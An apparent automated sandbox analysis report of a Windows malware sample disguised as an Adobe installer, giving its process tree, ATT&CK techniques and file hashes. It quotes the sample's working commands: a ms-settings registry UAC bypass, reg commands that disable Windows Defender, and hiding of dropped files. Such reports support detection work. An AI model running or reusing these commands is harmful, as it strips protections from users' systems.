c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	Set-up.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
2932	PING.EXE
1688	PING.EXE

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
2160	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp
2160	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp
2620	Adobe.tmp
2620	Adobe.tmp
2620	Adobe.tmp
2620	Adobe.tmp
2620	Adobe.tmp
2620	Adobe.tmp
2620	Adobe.tmp
2620	Adobe.tmp
2620	Adobe.tmp
2620	Adobe.tmp
2212	00008.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	2864	7z.exe
Token: 35	2864	7z.exe
Token: SeRestorePrivilege	2500	7z.exe
Token: 35	2500	7z.exe
Token: SeSecurityPrivilege	2500	7z.exe
Token: SeRestorePrivilege	2204	7z.exe
Token: 35	2204	7z.exe
Token: SeSecurityPrivilege	2204	7z.exe
Token: SeRestorePrivilege	2256	7z.exe
Token: 35	2256	7z.exe
Token: SeSecurityPrivilege	2256	7z.exe
Token: SeRestorePrivilege	2456	7z.exe
Token: 35	2456	7z.exe
Token: SeSecurityPrivilege	2456	7z.exe
Token: SeRestorePrivilege	1224	7z.exe
Token: 35	1224	7z.exe
Token: SeSecurityPrivilege	1224	7z.exe
Token: SeRestorePrivilege	908	7z.exe
Token: 35	908	7z.exe
Token: SeSecurityPrivilege	908	7z.exe
Token: SeRestorePrivilege	1048	7z.exe
Token: 35	1048	7z.exe
Token: SeSecurityPrivilege	1048	7z.exe
Token: SeRestorePrivilege	3036	7z.exe
Token: 35	3036	7z.exe
Token: SeSecurityPrivilege	3036	7z.exe
Token: SeSecurityPrivilege	3036	7z.exe
Token: SeRestorePrivilege	2732	7z.exe
Token: 35	2732	7z.exe
Token: SeSecurityPrivilege	2732	7z.exe
Token: SeSecurityPrivilege	2732	7z.exe
Token: SeRestorePrivilege	2616	7z.exe
Token: 35	2616	7z.exe
Token: SeSecurityPrivilege	2616	7z.exe
Token: SeSecurityPrivilege	2616	7z.exe
Token: SeRestorePrivilege	2604	7z.exe
Token: 35	2604	7z.exe
Token: SeSecurityPrivilege	2604	7z.exe
Token: SeSecurityPrivilege	2604	7z.exe
Token: SeRestorePrivilege	3060	7z.exe
Token: 35	3060	7z.exe
Token: SeSecurityPrivilege	3060	7z.exe
Token: SeSecurityPrivilege	3060	7z.exe
Token: SeRestorePrivilege	2764	7z.exe
Token: 35	2764	7z.exe
Token: SeSecurityPrivilege	2764	7z.exe
Token: SeSecurityPrivilege	2764	7z.exe
Token: SeRestorePrivilege	1512	7z.exe
Token: 35	1512	7z.exe
Token: SeSecurityPrivilege	1512	7z.exe
Token: SeSecurityPrivilege	1512	7z.exe
Token: SeRestorePrivilege	2940	7z.exe
Token: 35	2940	7z.exe
Token: SeSecurityPrivilege	2940	7z.exe
Token: SeSecurityPrivilege	2940	7z.exe
Token: SeRestorePrivilege	2144	7z.exe
Token: 35	2144	7z.exe
Token: SeSecurityPrivilege	2144	7z.exe
Token: SeSecurityPrivilege	2144	7z.exe
Token: SeRestorePrivilege	2744	7z.exe
Token: 35	2744	7z.exe
Token: SeSecurityPrivilege	2744	7z.exe
Token: SeSecurityPrivilege	2744	7z.exe
Token: SeDebugPrivilege	2212	00008.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
2160	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp
2620	Adobe.tmp
1912	cmd.exe
1912	cmd.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1756 wrote to memory of 2160	1756	889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe	31
PID 1756 wrote to memory of 2160	1756	889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe	31
PID 1756 wrote to memory of 2160	1756	889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe	31
PID 1756 wrote to memory of 2160	1756	889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe	31
PID 1756 wrote to memory of 2160	1756	889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe	31
PID 1756 wrote to memory of 2160	1756	889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe	31
PID 1756 wrote to memory of 2160	1756	889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe	31
PID 2160 wrote to memory of 568	2160	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	32
PID 2160 wrote to memory of 568	2160	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	32
PID 2160 wrote to memory of 568	2160	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	32
PID 2160 wrote to memory of 568	2160	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	32
PID 2160 wrote to memory of 568	2160	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	32
PID 2160 wrote to memory of 568	2160	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	32
PID 2160 wrote to memory of 568	2160	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	32
PID 2160 wrote to memory of 2760	2160	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	33
PID 2160 wrote to memory of 2760	2160	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	33
PID 2160 wrote to memory of 2760	2160	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	33
PID 2160 wrote to memory of 2760	2160	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	33
PID 2160 wrote to memory of 2724	2160	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	35
PID 2160 wrote to memory of 2724	2160	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	35
PID 2160 wrote to memory of 2724	2160	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	35
PID 2160 wrote to memory of 2724	2160	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	35
PID 2160 wrote to memory of 2960	2160	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	37
PID 2160 wrote to memory of 2960	2160	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	37
PID 2160 wrote to memory of 2960	2160	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	37
PID 2160 wrote to memory of 2960	2160	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	37
PID 2160 wrote to memory of 2744	2160	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	38
PID 2160 wrote to memory of 2744	2160	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	38
PID 2160 wrote to memory of 2744	2160	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	38
PID 2160 wrote to memory of 2744	2160	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	38
PID 568 wrote to memory of 2620	568	Adobe.exe	39
PID 568 wrote to memory of 2620	568	Adobe.exe	39
PID 568 wrote to memory of 2620	568	Adobe.exe	39
PID 568 wrote to memory of 2620	568	Adobe.exe	39
PID 568 wrote to memory of 2620	568	Adobe.exe	39
PID 568 wrote to memory of 2620	568	Adobe.exe	39
PID 568 wrote to memory of 2620	568	Adobe.exe	39
PID 2724 wrote to memory of 2680	2724	cmd.exe	40
PID 2724 wrote to memory of 2680	2724	cmd.exe	40
PID 2724 wrote to memory of 2680	2724	cmd.exe	40
PID 2724 wrote to memory of 2680	2724	cmd.exe	40
PID 2724 wrote to memory of 2560	2724	cmd.exe	41
PID 2724 wrote to memory of 2560	2724	cmd.exe	41
PID 2724 wrote to memory of 2560	2724	cmd.exe	41
PID 2724 wrote to memory of 2560	2724	cmd.exe	41
PID 2760 wrote to memory of 2016	2760	cmd.exe	42
PID 2760 wrote to memory of 2016	2760	cmd.exe	42
PID 2760 wrote to memory of 2016	2760	cmd.exe	42
PID 2760 wrote to memory of 2016	2760	cmd.exe	42
PID 2760 wrote to memory of 2168	2760	cmd.exe	43
PID 2760 wrote to memory of 2168	2760	cmd.exe	43
PID 2760 wrote to memory of 2168	2760	cmd.exe	43
PID 2760 wrote to memory of 2168	2760	cmd.exe	43
PID 2724 wrote to memory of 556	2724	cmd.exe	44
PID 2724 wrote to memory of 556	2724	cmd.exe	44
PID 2724 wrote to memory of 556	2724	cmd.exe	44
PID 2724 wrote to memory of 556	2724	cmd.exe	44
PID 2724 wrote to memory of 1560	2724	cmd.exe	45
PID 2724 wrote to memory of 1560	2724	cmd.exe	45
PID 2724 wrote to memory of 1560	2724	cmd.exe	45
PID 2724 wrote to memory of 1560	2724	cmd.exe	45
PID 2724 wrote to memory of 944	2724	cmd.exe	46
PID 2724 wrote to memory of 944	2724	cmd.exe	46
PID 2724 wrote to memory of 944	2724	cmd.exe	46

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3008	attrib.exe
2132	attrib.exe

C:\Users\Admin\AppData\Local\Temp\889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1756
- C:\Users\Admin\AppData\Local\Temp\is-KI1PG.tmp\889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-KI1PG.tmp\889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp" /SL5="$40150,9875652,804864,C:\Users\Admin\AppData\Local\Temp\889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:2160
- - C:\Program Files (x86)\WindowsPowerShell\Configuration\Adobe.exe
    "C:\Program Files (x86)\WindowsPowerShell\Configuration\Adobe.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:568
  - - C:\Users\Admin\AppData\Local\Temp\is-TSLFL.tmp\Adobe.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-TSLFL.tmp\Adobe.tmp" /SL5="$50150,5833262,804864,C:\Program Files (x86)\WindowsPowerShell\Configuration\Adobe.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      PID:2620
    - - C:\Program Files (x86)\WindowsPowerShell\Configuration\Set-up.exe
        
        "C:\Program Files (x86)\WindowsPowerShell\Configuration\Set-up.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Modifies system certificate store
        
        PID:1280
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\ProgramData\wu10.uac.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:812
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f
        6⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:2328
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f
        6⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1804
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\ProgramData\wu10.wdcloud.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:984
      - C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
        6⤵
        Modifies Windows Defender Real-time Protection settings
        System Location Discovery: System Language Discovery
        
        PID:2452
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2988
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2296
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1184
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
        6⤵
        Modifies Windows Defender Real-time Protection settings
        System Location Discovery: System Language Discovery
        
        PID:1588
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
        6⤵
        Modifies Windows Defender Real-time Protection settings
        System Location Discovery: System Language Discovery
        
        PID:2080
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
        6⤵
        Modifies Windows Defender Real-time Protection settings
        System Location Discovery: System Language Discovery
        
        PID:584
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        6⤵
        Modifies Windows Defender Real-time Protection settings
        System Location Discovery: System Language Discovery
        
        PID:2968
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
        6⤵
        Modifies Windows Defender Real-time Protection settings
        System Location Discovery: System Language Discovery
        
        PID:2184
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1968
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1148
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2700
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:636
      - C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2336
      - C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1852
      - C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2752
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\wu10.run.vbs"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2964
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\ProgramData\main.bat" "
        6⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1736
        
        C:\Windows\SysWOW64\mode.com
        
        mode 65,10
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2068
        
        C:\ProgramData\7z.exe
        
        7z.exe e file.zip -p___________1903pwd1764pwd14586___________ -oextracted
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:3036
        
        C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_9.zip -oextracted
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2732
        
        C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_8.zip -oextracted
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2616
        
        C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_7.zip -oextracted
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2604
        
        C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_6.zip -oextracted
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:3060
        
        C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_5.zip -oextracted
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2764
        
        C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_4.zip -oextracted
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1512
        
        C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_3.zip -oextracted
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2940
        
        C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_2.zip -oextracted
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2144
        
        C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_1.zip -oextracted
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2744
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +H "00008.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:2132
        
        C:\ProgramData\00008.exe
        
        "00008.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2212
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\wu10.2run.vbs"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1092
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\ProgramData\wu10.delete.bat" "
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1808
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 60 127.1
        7⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1688
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\ProgramData\wu10.uac.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2760
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:2016
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:2168
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\ProgramData\wu10.wdcloud.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2724
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2680
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2560
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:556
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1560
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      PID:944
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      PID:1100
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      PID:1924
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      PID:1504
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      PID:1652
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1600
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1732
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2828
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2128
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2364
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:624
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2368
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ProgramData\wu10.run.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2960
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\ProgramData\main.bat" "
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious use of FindShellTrayWindow
      PID:1912
    - - C:\Windows\SysWOW64\mode.com
        
        mode 65,10
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2012
    - - C:\ProgramData\7z.exe
        
        7z.exe e file.zip -p___________27117pwd32413pwd32179___________ -oextracted
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2864
    - - C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_7.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2500
    - - C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_6.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2204
    - - C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_5.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2256
    - - C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_4.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2456
    - - C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_3.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1224
    - - C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_2.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:908
    - - C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_1.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1048
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +H "123.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:3008
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ProgramData\wu10.2run.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2744
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\ProgramData\wu10.delete.bat" "
      4⤵
      System Location Discovery: System Language Discovery
      PID:1484
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 60 127.1
        5⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2932

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\7z.dll

Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\extracted\file_5.zip

Filesize
579KB

MD5
cf769707931e40692892baec51f61f7e

SHA1
92a00bca5d5dc2fa8127fe3bf245ac25f4a7d168

SHA256
5f84ea95825879689b2be7d4ee06be8e5efa077c7a4541c6bf4c5efee47823a1

SHA512
31acae932f2ecee9f8ff087fadd6b4ae08b1476b070af6609f1961722c70ff4ea6642a1ed908ec1d391addfa6c22fc45569639ffde919693e6c01f4ac8ffd8c8

Download Submit
C:\ProgramData\extracted\file_6.zip

Filesize
579KB

MD5
3903605d1086b2a11f0745e595b8337e

SHA1
efbf5c65c249ebdadc452c98186dce4a6f7f94cb

SHA256
59304259a5df8481416c12a8e92dffb877f690b64a311abffe785b56ecd1f15d

SHA512
